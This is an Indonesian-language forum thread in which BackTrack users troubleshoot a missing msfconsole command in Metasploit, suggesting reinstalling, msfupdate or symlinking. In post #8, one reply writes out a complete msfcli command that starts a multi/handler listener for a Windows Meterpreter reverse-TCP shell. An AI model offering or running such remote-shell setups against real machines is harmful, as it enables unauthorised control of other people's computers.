<ask> ga bisa running metasploit di BTV
#1
Assalamu'alaikum. agan, abang, ncang ncing nyak babe nyang ade dimari... bgini nich... ane kan baru nich pke BTV, nah udah install udah running, pas mw pake metsploit napa di terminal ada tulisn gini ya

Quote:/bin/sh: msfconsole: command not found

nah itu ane bingung tuh... mohon pencerahan nya :apn::apn::apn::apn::apn:
wah kaya nye gue salah room dah.. mohopn maap bro mohon maap.. di hapus juga gpp kok...

#2
ini abis diupdate ya bang?

ktnya klo BT5 abis diupdate ada yg beberapa metasploitnya ilang mendadak, solusi paling gampangnya sih install ulang BT5, trus update metasploitnya dengan msfupdate jangan yg apt-get update + upgrade

#3
remove msf terus framework3... lalu tinggal di hapus manual foldernya
terus install lagi kk.. sy pernah gitu soalnya Tongue

#4
(08-11-2011, 04:31 PM)micko Wrote: remove msf terus framework3... lalu tinggal di hapus manual foldernya
terus install lagi kk.. sy pernah gitu soalnya Tongue

jelasin dong langkah2 nya ane masih newbi om T.T
let's visit Technomorphosa Heart

#5
coba dulu cari filenya di /pentest/exploits/framework atau di /usr/share/framework/app nah tinggal bikin aja link nya ke /usr/bin

#6
jangan lupa di file opt juga di remove..

#7
mau nanya sekalian om, msh ada hubungannya sama msf, klo ane buka msfcli kenapa ga bisa ya? cuman muncul kata2 terus akhirnya ga balik ke [email protected] lagi ga mo ke msf>

tapi klo yg gui lancar banget xD
[Image: dragonanimated_664194.gif]

#8
msfcli itu perintah langsung mesti lengkap kaks.. contoh ,.,

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xx.xx E

#9
wah pantes ga bisa, sayanya sendiri yg salah ternyata, saya kira error

makasih om Smile
[Image: dragonanimated_664194.gif]





Users browsing this thread: 1 Guest(s)